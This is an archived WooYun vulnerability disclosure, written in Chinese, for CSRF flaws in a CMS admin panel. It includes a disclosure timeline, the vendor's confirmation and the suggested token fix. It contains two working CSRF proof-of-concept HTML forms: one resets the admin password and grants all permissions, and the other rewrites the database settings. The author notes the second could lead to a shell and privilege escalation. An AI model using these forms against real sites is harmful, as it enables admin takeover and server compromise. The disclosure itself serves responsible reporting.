乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-25: 细节已通知厂商并且等待厂商处理中 2015-03-26: 厂商已经确认,细节仅向厂商公开 2015-03-29: 细节向第三方安全合作伙伴开放 2015-05-20: 细节向核心白帽子及相关领域专家公开 2015-05-30: 细节向普通白帽子公开 2015-06-09: 细节向实习白帽子公开 2015-06-24: 细节向公众公开
CSRF
危害很大首先是可以改管理密码
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://127.0.0.1/index.php?s=Admin/Master/Update" method="POST"> <input type="hidden" name="id" value="1" /> <input type="hidden" name="pwd2" value="7fef6171469e80d32c0559f88b377245" /> <input type="hidden" name="pwd" value="shabi123" /> <input type="hidden" name="repwd" value="shabi123" /> <input type="hidden" name="usertype[0]" value="1" /> <input type="hidden" name="usertype[1]" value="1" /> <input type="hidden" name="usertype[2]" value="1" /> <input type="hidden" name="usertype[3]" value="1" /> <input type="hidden" name="usertype[4]" value="1" /> <input type="hidden" name="usertype[5]" value="1" /> <input type="hidden" name="usertype[6]" value="1" /> <input type="hidden" name="usertype[7]" value="1" /> <input type="hidden" name="usertype[8]" value="1" /> <input type="hidden" name="usertype[9]" value="1" /> <input type="hidden" name="usertype[10]" value="1" /> <input type="hidden" name="usertype[11]" value="1" /> <input type="hidden" name="usertype[12]" value="1" /> <input type="hidden" name="usertype[13]" value="1" /> <input type="hidden" name="usertype[14]" value="1" /> <input type="hidden" name="usertype[15]" value="1" /> <input type="hidden" name="usertype[16]" value="1" /> <input type="hidden" name="usertype[17]" value="1" /> <input type="hidden" name="usertype[18]" value="1" /> <input type="hidden" name="submit" value="提交" /> <input type="hidden" name="__hash__" value="8637bf9833545453f7649bd6e16ad060" /> <input type="submit" value="Submit request" /> </form> </body></html>
还有可以改数据库
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://127.0.0.1/index.php?s=Admin/Config/Updatedb" method="POST"> <input type="hidden" name="con[db_host]" value="admin" /> <input type="hidden" name="con[db_name]" value="ekucms" /> <input type="hidden" name="con[db_user]" value="root" /> <input type="hidden" name="con[db_pwd]" value="admin888" /> <input type="hidden" name="con[db_port]" value="3306" /> <input type="hidden" name="submit" value="提交" /> <input type="hidden" name="__hash__" value="c59f9ef9c6e6f578038f368ff2b9817a" /> <input type="submit" value="Submit request" /> </form> </body></html>
这里可以执行SQL语句,可适当利用getshell,提权
加token
危害等级:低
漏洞Rank:2
确认时间:2015-03-26 12:12
前提是需要知道系统的重要参数才可利用是吗,比如管理员帐号、密码、DB信息等,token确有必要,谢谢您的提醒~!
暂无